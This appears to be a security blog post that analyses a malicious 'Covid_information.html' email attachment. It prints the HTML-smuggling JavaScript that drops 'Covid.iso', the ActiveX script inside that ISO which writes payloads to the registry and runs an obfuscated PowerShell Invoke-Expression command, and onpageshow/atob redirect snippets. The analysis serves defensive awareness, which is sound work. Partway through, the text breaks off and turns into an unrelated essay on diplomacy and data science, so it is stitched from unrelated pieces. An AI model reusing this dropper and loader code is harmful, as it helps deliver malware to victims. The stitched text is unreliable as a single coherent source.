Everyone knows by now that you have to be very careful when surfing the internet. A little carelessness can cost you a lot and can lead to the loss of data and information, which are the most precious intangible asset today. As 72% of attacks coming into organizations were reported to be attacks through email, in this post I warn again about HTML files that can be received by email as attachments. They seem harmless but looking at them closely they hide a thousand pitfalls and dangers.

At Application Level any device interact with the cyberspace mainly using mail client and web browser.

As a demonstration of the above I’m going to examine as much as possible an HTML file received as an attachment. It’s named “Covid_information.html”.

Parallel use of many attack techniques: Spear Phishing, Malicious code in an HTML file and Web browser vulnerabilities

The JavaScript code inside “Covid_information.html” is the following one.

</script>

  text=”a base-64 encoded long string of 1622 KB”

  function download(data, filename, type) {
    var file = new Blob([data], {type: type});
    if (window.navigator.msSaveOrOpenBlob) 
        window.navigator.msSaveOrOpenBlob(file, filename);
    else { 
        var a = document.createElement("a"),
                url = URL.createObjectURL(file);
        a.href = url;
        a.download = filename;
        document.body.appendChild(a);
        a.click();
        setTimeout(function() {
            document.body.removeChild(a);
            window.URL.revokeObjectURL(url);  
        }, 0); 
    }
}
bt = atob(text);
bN = new Array(bt.length);
for(var i =0;i < bt.length; i++){
   bN[i] = bt.charCodeAt(i);
}
bA = new Uint8Array(bN);
download(bA,"Covid.iso","application/x-cd-image")

</script>

The first statement is an assignment to the variable “text” of a base-64 encoded 1622 KB string. Practically this is the malicious payload to which we will give a look afterwards.

After the function “download”:

  1. creates a hyperlink on-fly;
  2. link to it a file created using the content of data variable;
  3. download this file. 

The following statement decode the base-64 content of “text” using the atob() function.

The any char is transcoded to Unicode using charCodeAt() function. At the end the file named "Covid.iso" is downloaded to the local storage.

An outlook to Covid.iso file.

The file Covid.iso encapsulated an HTML file with the following JavaScript code:

    <script language="javascript">
    var a = new ActiveXObject('Wscript.Shell');
    function start() {
        res = document.getElementById("p1").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver", res, "REG_SZ");
        res = document.getElementById("p2").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver2", res, "REG_SZ");
        res = document.getElementById("c1").innerHTML;
        res += document.getElementById("c2").innerHTML;
        res += document.getElementById("c3").innerHTML;
        res += document.getElementById("c4").innerHTML;

        res += document.getElementById("c5").innerHTML;
        a.Run(res, 0);
        
    }
    </script>

In this code what is crucial is the content of DOM elements which are on board of HTML file, that is: p1,p2,c1,c2,c3,c4 and c5.

These elements are used for a kind of obfuscation; because they are then assembled together in order to execute any sort of code in the host machine.

P1= (“a base-64 encoded long string”) containing a binary.

P2= (“a base-64 encoded long string”) containing code:

c1=powers

c2=hell -C Invo

c3=ke-Expression (g

c4=p HKCU:\\SO

c5=FTWARE\\JavaSoft).Ver

the final command is:

powershell -C Invoke-Expression (gp HKCU:\\SOFTWARE\\JavaSoft).Ver

Invoke-Expression cmdlet is used to perform a command or expression on local computer.

Even if the above analysis is not complete, it demonstrates a high level of sophistication resulting from guys with a high level of know-how.

So beware of attachments in HTML format!

References

Email attachments are one of the main vector of malicious code. According to analysis by Helsinki-based security provider F-Secure 85% of all malicious emails have a .DOC, .XLS, .PDF, .ZIP, or .7Z attached.

But now, in addition to them, we have to consider another type of dangerous attachment .HTML.

When we receive an email with an attachment of .HTML type, we have to be very careful and don’t’ open it. The .HTML file could contain, for example, these dangerous JavaScript code:

<body onpageshow="document.location.replace(window.atob('a base-64 encoded string'));">

or

<frameset onpageshow="document.location.replace(window.atob('a base-64 encoded string'));">

It is used onpageshow event because it occurs every time the page is loaded, while the onload event occurs only when the page first loads and it does not occur when the page is loaded from the cache.

document.location.replace(newURL) replaces the current document with a new one.

The atob() method decodes a base-64 encoded string encoded by the btoa() method. The base-64 code string obfuscates the URL it represents.

In the second code snippet we can notice the use of <frameset> tag which is deprecated, no longer recommended and not supported in HTML5. Anyway some browsers might still support it for compatibility purposes.

The problem is that the JavaScript code inside the HTML page can load any URL page, and only decoding the “base-64 encoded string” you can know which web page. The decoding of base-64 string is done dynamically by atob function when the web page is showed in the web browser. So, if you open the file, it is already too late in case of malicious web page.

With malicious code in a web page we can have:

  • Malicious Ads: they are advertisements on the Web that infect the user's machine with malware in order to make the compromised machine a member of a Botnet.
  • A Malware Distribution Network (MDN): it is a collection of landing pages, malware repository servers, and standard redirection pages. The goal of an MDN is to redirect the victim from a landing page to a malware repository server.
  • Drive by Downloads: it refers to the automatic download of software to a user's device, without the user's knowledge or consent.

Here it is how an antivirus reacted when it scans this type of HTML attachment:

Marco Alberti in his book “Open Diplomacy” [02] reviews the way of doing diplomacy after by the nine years of experience at ENEL Company as responsible for international institutional affairs.

New technologies have transformed and changed international relations. In this constantly evolving world diplomacy must operate and develop strategies and visions. It must use all possible new means: innovation, digitalization, data science (data-driven diplomacy) to be competitive in the international scenario. Diplomat must act as System Orchestrator to face the quick changing of the world and have to take advantage of the human factor by enhancing its competence to win the challenge.

As the diplomat represents the state, which in turn represents the citizens, his goal is to interpret the complexity in order to protect, defend and promote his state and citizen interests and create value while promoting cooperative relations with other states.

ICT COMPETENCE OR DIGITAL COMPETENCE

In general, by competence we intend the potential to put into operation an effective behavior. When we talk about competence, related to person, we must consider on the one hand his qualities, which help him to be successful at work and in the life, on the other hand his competence as knowledge acquired during his studies and during his experience.

It is clear that personal qualities and knowledge put together give the ability to a person to produce superior performance in work as well as in other fields.

ICT COMPETENCE AND DATA DIPLOMACY

Data has a source, can have an owner, can be public or private, shared or not shared. Then use of them can lead to benefits or disadvantages. Data could have an impact on the individual, institutional, state, or on global level.

Data are of many types: structured, unstructured, quantitative, and categorical. Huge quantity of data (Big Data), then, is massive and contain greater Variety, arriving in increasing Volumes and with higher Velocity (3Vs).

It occurs Data Science to manage and work with data. Data Science is a multidisciplinary field that understands and extracts insights from the ever-increasing amounts of data. It put together concepts from computer science, statistics/machine learning and data analysis.  It uses two paradigms of data research:

  • Hypothesis-Driven: given a problem, what kind of data do we need to help solve it?
  • Data-Driven: given some data, what interesting problems can be solved with it?

Data Science tries to understand what can learn from data and what actions we can take once we find whatever it is we are looking for.

In this framework where data can affect diplomatic processes or triggering policy actions, we have to consider the risks associated with using it especially in data-driven interactions. Digital data and algorithms/software can be modified, manipulated, tampered and therefore they can easily be “hacked” by actors with malicious intent. Given the global nature of cyber threats, it occurs appropriate caution and a cybersecurity infrastructure to filter, protect and use digital data.

The origin of data can be international institution like OCSE, ONU and so on, open source, whistle-blowing data disclosures (Edward Snowden’s public revelation) or data scraped and shared by hackers.

So it occurs to give the right weight to data by trying to distinguish “trusted data” from “fake data”. This is very important when it is used a data-driven decision schema from important players like diplomats.

REFERENCES

[01] "Diplomacy X.0": coined by the Ambassador Giampiero Massolo;

[02] Marco Alberti, Open Diplomacy. Diplomazia economica aumentata al tempo del Covid-1https://www.ibs.it/open-diplomacy-diplomazia-economica-aumentata-libro-marco-alberti/e/9788849865134;

[03] Andy Boyd, Jane Gatewood, Stuart Thorson and Timothy D.V. Dye, Data Diplomacy https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6785044/#FN5

[04]  Should Data Science be considered as its own discipline? https://thedatascientist.com/data-science-considered-own-discipline/